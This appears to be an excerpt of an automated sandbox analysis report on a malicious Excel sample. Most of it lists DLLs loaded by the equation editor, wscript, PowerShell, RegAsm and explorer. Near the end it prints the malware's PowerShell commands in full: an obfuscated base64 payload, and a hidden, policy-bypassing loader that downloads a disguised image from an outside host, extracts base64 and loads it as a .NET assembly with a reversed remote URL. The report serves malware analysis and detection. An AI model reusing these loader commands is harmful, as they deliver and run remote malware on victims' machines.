              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
              Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
              Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
              Source: C:\Windows\explorer.exeSection loaded: duser.dll
              Source: C:\Windows\explorer.exeSection loaded: dui70.dll
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\explorer.exeSection loaded: slc.dll
              Source: C:\Windows\explorer.exeSection loaded: secur32.dll
              Source: C:\Windows\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
              Source: C:\Windows\explorer.exeSection loaded: duser.dll
              Source: C:\Windows\explorer.exeSection loaded: dui70.dll
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\explorer.exeSection loaded: slc.dll
              Source: C:\Windows\explorer.exeSection loaded: secur32.dll
              Source: C:\Windows\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
              Source: C:\Windows\explorer.exeSection loaded: duser.dll
              Source: C:\Windows\explorer.exeSection loaded: dui70.dll
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\explorer.exeSection loaded: slc.dll
              Source: C:\Windows\explorer.exeSection loaded: secur32.dll
              Source: C:\Windows\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
              Source: C:\Windows\explorer.exeSection loaded: duser.dll
              Source: C:\Windows\explorer.exeSection loaded: dui70.dll
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\explorer.exeSection loaded: slc.dll
              Source: C:\Windows\explorer.exeSection loaded: secur32.dll
              Source: C:\Windows\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
              Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
              Source: C:\Windows\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.454053406.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: RegAsm.pdb source: rugtucw, 00000010.00000000.504303884.0000000000F92000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
              Source: Binary string: RegAsm.pdb4 source: rugtucw, 00000010.00000000.504303884.0000000000F92000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
              Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.454053406.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp
              Source: #20240627_Edlen_A.xlsInitial sample: OLE indicators vbamacros = False
              Source: #20240627_Edlen_A.xlsInitial sample: OLE indicators encrypted = True

              Data Obfuscation

              barindex
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
